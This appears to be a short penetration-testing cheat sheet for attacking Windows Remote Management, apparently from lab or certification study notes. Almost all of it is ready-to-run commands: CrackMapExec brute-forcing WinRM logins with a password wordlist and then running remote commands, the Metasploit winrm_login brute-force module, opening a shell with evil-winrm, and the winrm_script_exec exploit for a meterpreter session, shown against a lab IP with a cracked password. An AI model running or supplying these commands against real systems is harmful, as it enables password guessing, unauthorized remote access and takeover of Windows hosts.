Brute force and Authentication

#Enumeration

#CrackMapExec Brute-force

crackmapexec winrm <ip address> -u username or file -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

EXAMPLE:-
crackmapexec winrm 10.4.30.175 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

• Execute specific Windows commands

crackmapexec winrm 10.4.30.175 -u administrator -p tinkerbell -x "whoami"
crackmapexec winrm 10.4.30.175 -u administrator -p tinkerbell -x "systeminfo"

Metasploit Brute Force

# Brute force WinRM login
search winrm_login
use auxiliary/scanner/winrm/winrm_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

evil-WinRM Shell

• Get a command shell session using evil-winrm tool

evil-winrm.rb -u username -p 'password' -i <ip address>

Example:- 

evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.4.30.175

#Metasploit meterpreter session

Another alternative for Winrm is its WinRm metasploit module

search winrm_script
use exploit/windows/winrm/winrm_script_exec
set RHOSTS 10.4.30.175
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit